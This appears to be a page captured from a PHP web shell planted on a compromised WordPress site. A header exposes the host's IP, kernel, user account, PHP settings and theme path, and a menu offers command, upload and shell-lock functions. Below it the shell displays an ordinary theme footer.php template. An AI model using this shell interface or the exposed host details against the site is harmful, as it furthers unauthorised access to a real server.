hyun.psd; gzuncompress
|
Server IP : 173.236.192.202 / Your IP : 216.73.216.85 Web Server : Apache System : Linux iad1-shared-e1-03 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64 User : andfor18 ( 14551322) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/andfor18/mbssigns.com/wp-content/themes/multinews/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] | [ Lock Shell ] | [ Logout ] |
|---|
<?php
if(mom_option('widgets_footer') != 0) {
if( wp_is_mobile() && mom_option('hide_footer_in_mobiles') == 1 ){
// do nothing
} else {
get_template_part( 'framework/includes/theme-footer' );
}
}
?>
<?php if(mom_option('cat_footer_menu')) { ?>
<div class="footer-menu clearfix">
<div class="inner">
<?php if ( has_nav_menu( 'footer' ) ) {
$footer_menu_query = wp_nav_menu( array('theme_location' => 'footer', 'walker' => new mom_custom_Walker(), 'container' => 'ul', 'menu_class' => 'footer_mega_menu', 'echo' => 0));
echo $footer_menu_query;
} else { ?> <i class="menu-message"><?php _e('Select your Footer Menu from wp menus', 'framework'); ?></i> <?php } ?>
</div>
</div>
<?php } ?>
<?php if(mom_option('bottom_footer')) { ?>
<div class="footer-bottom" role="contentinfo" itemscope="itemscope" itemtype="http://schema.org/WPFooter">
<div class="inner">
<div class="alignright">
<?php
if(mom_option('copyright_menu')) {
if ( has_nav_menu( 'copyright' ) ) {
wp_nav_menu( array( 'menu_class' => 'footer-bottom-menu', 'theme_location' => 'copyright'));
}
}
?>
<?php if(mom_option('footer_social')) { ?>
<ul class="footer-bottom-social">
<?php get_template_part( 'framework/includes/social' ); ?>
</ul>
<?php } ?>
</div>
<div class="alignleft">
<?php if(mom_option('footer_logo')) { ?>
<div class="footer-logo">
<a itemprop="url" href="<?php echo esc_url(home_url()); ?>">
<?php if(mom_option('foot_retina_logo','url') != '') { ?>
<img src="<?php echo mom_option('foot_retina_logo','url'); ?>" width="<?php echo mom_option('foote_retina_logo_size','width'); ?>" height="<?php echo mom_option('foote_retina_logo_size','height'); ?>" alt="<?php bloginfo('name'); ?>">
<?php } else { ?>
<img src="<?php echo mom_option('foot_logo','url'); ?>" width="<?php echo mom_option('foot_logo','width'); ?>" height="<?php echo mom_option('foot_logo','height'); ?>" alt="<?php bloginfo('name'); ?>">
<?php } ?>
</a>
</div>
<?php } ?>
<div class="copyrights"><?php echo wp_specialchars_decode(mom_option('footer-text')); ?></div>
</div>
</div>
</div>
<?php } ?>
<?php if(mom_option('scroll_top_bt')) { ?><a class="toup" href="#"><i class="enotype-icon-arrow-up6"></i></a><?php } ?>
</div><!--fixed layout-->
</div> <!-- wrap every thing -->
<?php wp_footer(); ?>
<?php echo mom_option('footer_script'); ?>
</body>
</html>